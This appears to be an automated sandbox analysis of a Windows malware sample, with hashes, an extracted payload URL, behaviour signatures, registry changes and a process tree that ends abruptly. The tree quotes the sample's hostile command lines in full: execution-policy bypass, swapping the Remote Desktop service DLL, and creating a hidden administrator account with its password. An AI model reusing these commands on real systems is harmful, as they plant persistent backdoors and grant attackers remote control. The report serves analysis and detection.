Analysis
- max time kernel: 133s
- max time network: 165s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 24-08-2021 05:19
Static task: static1
Behavioral task: behavioral1
  Sample: 1aa9dda1b9b413444b0668500611c7f3.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 1aa9dda1b9b413444b0668500611c7f3.exe
  Resource: win10v20210408
General
- Target: 1aa9dda1b9b413444b0668500611c7f3.exe
- Size: 7.2MB
- MD5: 1aa9dda1b9b413444b0668500611c7f3
- SHA1: d980ac83bf107df1a7510ad94304a7e364d927a5
- SHA256: 02031c62d916cdd41d26a271e93ec5b06eabfa910187207b02ead07fd480c2a9
- SHA512: 37a301fd61c42c10f774950826469f215a20a24d783316febfeafd0fa06d88f536daa4d5d10153fd1ec42cc778d87716fe5b4bb9782c03e86a4e3b336e9efd53
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow | pid | process):
  17 | 1176 | powershell.exe
  19 | 1176 | powershell.exe
  20 | 1176 | powershell.exe
  21 | 1176 | powershell.exe
  23 | 1176 | powershell.exe
  25 | 1176 | powershell.exe
  27 | 1176 | powershell.exe
  29 | 1176 | powershell.exe
  31 | 1176 | powershell.exe
- Executes dropped EXE (3 IoCs)
  Processes (pid | process):
  2076 | Uso.exe.com
  3940 | Uso.exe.com
  1840 | Uso.exe.com
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
-
  Processes (resource | yara_rule):
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Loads dropped DLL (2 IoCs)
  Processes (pid | process):
  2920 | (process name empty in report)
  2920 | (process name empty in report)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
  PID 3940 set thread context of 1840 | 3940 | Uso.exe.com | Uso.exe.com
- Drops file in Program Files directory (4 IoCs)
  Processes (description | ioc | process):
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description | ioc | process):
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8AF7.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B67.tmp | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B18.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8A98.tmp | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zqdv43pd.al1.psm1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B08.tmp | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lprmbcq1.bu2.ps1 | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description | flow | ioc):
  HTTP User-Agent header | 19 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 20 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 21 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 23 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid | process), repeated rows collapsed with a count:
  2068 | powershell.exe (x3)
  3236 | powershell.exe (x3)
  1916 | powershell.exe (x3)
  3680 | powershell.exe (x3)
  2068 | powershell.exe (x3)
  1176 | powershell.exe (x3)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid | process):
  620 | (process name empty in report)
  620 | (process name empty in report)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description | pid | process), grouped by pid:
  1840 Uso.exe.com: Token: SeDebugPrivilege
  2068 powershell.exe: Token: SeDebugPrivilege
  3236 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  1916 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3680 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- Suspicious use of FindShellTrayWindow (6 IoCs)
  Processes (pid | process), repeated rows collapsed with a count:
  2076 | Uso.exe.com (x3)
  3940 | Uso.exe.com (x3)
- Suspicious use of SendNotifyMessage (6 IoCs)
  Processes (pid | process), repeated rows collapsed with a count:
  2076 | Uso.exe.com (x3)
  3940 | Uso.exe.com (x3)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description | pid | process | target process), repeated rows collapsed with a count:
  PID 584 wrote to memory of 1088 | 584 | 1aa9dda1b9b413444b0668500611c7f3.exe | dllhost.exe (x3)
  PID 584 wrote to memory of 504 | 584 | 1aa9dda1b9b413444b0668500611c7f3.exe | cmd.exe (x3)
  PID 504 wrote to memory of 3168 | 504 | cmd.exe | cmd.exe (x3)
  PID 3168 wrote to memory of 2080 | 3168 | cmd.exe | findstr.exe (x3)
  PID 3168 wrote to memory of 2076 | 3168 | cmd.exe | Uso.exe.com (x2)
  PID 3168 wrote to memory of 2188 | 3168 | cmd.exe | PING.EXE (x3)
  PID 2076 wrote to memory of 3940 | 2076 | Uso.exe.com | Uso.exe.com (x2)
  PID 3940 wrote to memory of 1840 | 3940 | Uso.exe.com | Uso.exe.com (x4)
  PID 1840 wrote to memory of 2068 | 1840 | Uso.exe.com | powershell.exe (x2)
  PID 2068 wrote to memory of 3976 | 2068 | powershell.exe | csc.exe (x2)
  PID 3976 wrote to memory of 2132 | 3976 | csc.exe | cvtres.exe (x2)
  PID 2068 wrote to memory of 3236 | 2068 | powershell.exe | powershell.exe (x2)
  PID 2068 wrote to memory of 1916 | 2068 | powershell.exe | powershell.exe (x2)
  PID 2068 wrote to memory of 3680 | 2068 | powershell.exe | powershell.exe (x2)
  PID 2068 wrote to memory of 4060 | 2068 | powershell.exe | reg.exe (x2)
  PID 2068 wrote to memory of 192 | 2068 | powershell.exe | reg.exe (x2)
  PID 2068 wrote to memory of 212 | 2068 | powershell.exe | reg.exe (x2)
  PID 2068 wrote to memory of 1248 | 2068 | powershell.exe | net.exe (x2)
  PID 1248 wrote to memory of 3916 | 1248 | net.exe | net1.exe (x2)
  PID 2068 wrote to memory of 2560 | 2068 | powershell.exe | cmd.exe (x2)
  PID 2560 wrote to memory of 3140 | 2560 | cmd.exe | cmd.exe (x2)
  PID 3140 wrote to memory of 3948 | 3140 | cmd.exe | net.exe (x2)
  PID 3948 wrote to memory of 1648 | 3948 | net.exe | net1.exe (x2)
  PID 2068 wrote to memory of 1116 | 2068 | powershell.exe | cmd.exe (x2)
  PID 1116 wrote to memory of 3476 | 1116 | cmd.exe | cmd.exe (x2)
  PID 3476 wrote to memory of 3864 | 3476 | cmd.exe | net.exe (x2)
  PID 3864 wrote to memory of 2108 | 3864 | net.exe | net1.exe (x2)
  PID 3960 wrote to memory of 2880 | 3960 | cmd.exe | net.exe (x2)
  PID 2880 wrote to memory of 2096 | 2880 | net.exe | net1.exe (x1)
Processes
(Process tree; each entry shows image path, command line, triggered signatures and PID, indented by tree depth.)
Level 1: C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"
  - Suspicious use of WriteProcessMemory
  PID: 584
  Level 2: C:\Windows\SysWOW64\dllhost.exe
    Command line: "C:\Windows\System32\dllhost.exe"
    PID: 1088
  Level 2: C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx
    - Suspicious use of WriteProcessMemory
    PID: 504
    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: cmd
      - Suspicious use of WriteProcessMemory
      PID: 3168
      Level 4: C:\Windows\SysWOW64\findstr.exe
        Command line: findstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx
        PID: 2080
      Level 4: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
        Command line: Uso.exe.com B
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
        PID: 2076
        Level 5: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
          Command line: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
          - Suspicious use of WriteProcessMemory
          PID: 3940
          Level 6: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
            Command line: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 1840
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
              - Drops file in Windows directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
              PID: 2068
              Level 8: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1f1xzxvc\1f1xzxvc.cmdline"
                - Suspicious use of WriteProcessMemory
                PID: 3976
                Level 9: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF3D7.tmp" "c:\Users\Admin\AppData\Local\Temp\1f1xzxvc\CSCC01F7819505B4CD38E2EBF3B2323F1.TMP"
                  PID: 2132
              Level 8: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 3236
              Level 8: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 1916
              Level 8: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 3680
              Level 8: C:\Windows\system32\reg.exe
                Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                (0x1C21 is decimal 7201; this is the non-default RDP listening port set by the sample.)
                PID: 4060
              Level 8: C:\Windows\system32\reg.exe
                Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                - Modifies registry key
                PID: 192
              Level 8: C:\Windows\system32\reg.exe
                Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                PID: 212
              Level 8: C:\Windows\system32\net.exe
                Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                - Suspicious use of WriteProcessMemory
                PID: 1248
                Level 9: C:\Windows\system32\net1.exe
                  Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  PID: 3916
              Level 8: C:\Windows\system32\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                - Suspicious use of WriteProcessMemory
                PID: 2560
                Level 9: C:\Windows\system32\cmd.exe
                  Command line: cmd /c net start rdpdr
                  - Suspicious use of WriteProcessMemory
                  PID: 3140
                  Level 10: C:\Windows\system32\net.exe
                    Command line: net start rdpdr
                    - Suspicious use of WriteProcessMemory
                    PID: 3948
                    Level 11: C:\Windows\system32\net1.exe
                      Command line: C:\Windows\system32\net1 start rdpdr
                      PID: 1648
              Level 8: C:\Windows\system32\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                - Suspicious use of WriteProcessMemory
                PID: 1116
                Level 9: C:\Windows\system32\cmd.exe
                  Command line: cmd /c net start TermService
                  - Suspicious use of WriteProcessMemory
                  PID: 3476
                  Level 10: C:\Windows\system32\net.exe
                    Command line: net start TermService
                    - Suspicious use of WriteProcessMemory
                    PID: 3864
                    Level 11: C:\Windows\system32\net1.exe
                      Command line: C:\Windows\system32\net1 start TermService
                      PID: 2108
      Level 4: C:\Windows\SysWOW64\PING.EXE
        Command line: ping GFBFPSXA -n 30
        - Runs ping.exe
        PID: 2188
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  - Suspicious use of WriteProcessMemory
  PID: 3960
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
    PID: 2880
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
      PID: 2096
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc n6UvtOVP /add
  PID: 2764
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc n6UvtOVP /add
    PID: 3684
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc n6UvtOVP /add
      PID: 3968
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  PID: 2164
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    PID: 2716
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      PID: 1356
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  PID: 1132
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    PID: 852
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
      PID: 1176
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  PID: 4052
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    PID: 1184
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
      PID: 3168
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc n6UvtOVP
  PID: 1940
  Level 2: C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc n6UvtOVP
    PID: 3560
    Level 3: C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc n6UvtOVP
      PID: 2880
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  PID: 1916
  Level 2: C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS
    PID: 2208
Level 1: C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  PID: 2144
  Level 2: C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    - Modifies data under HKEY_USERS
    PID: 1808
Level 1: C:\Windows\System32\cmd.exe
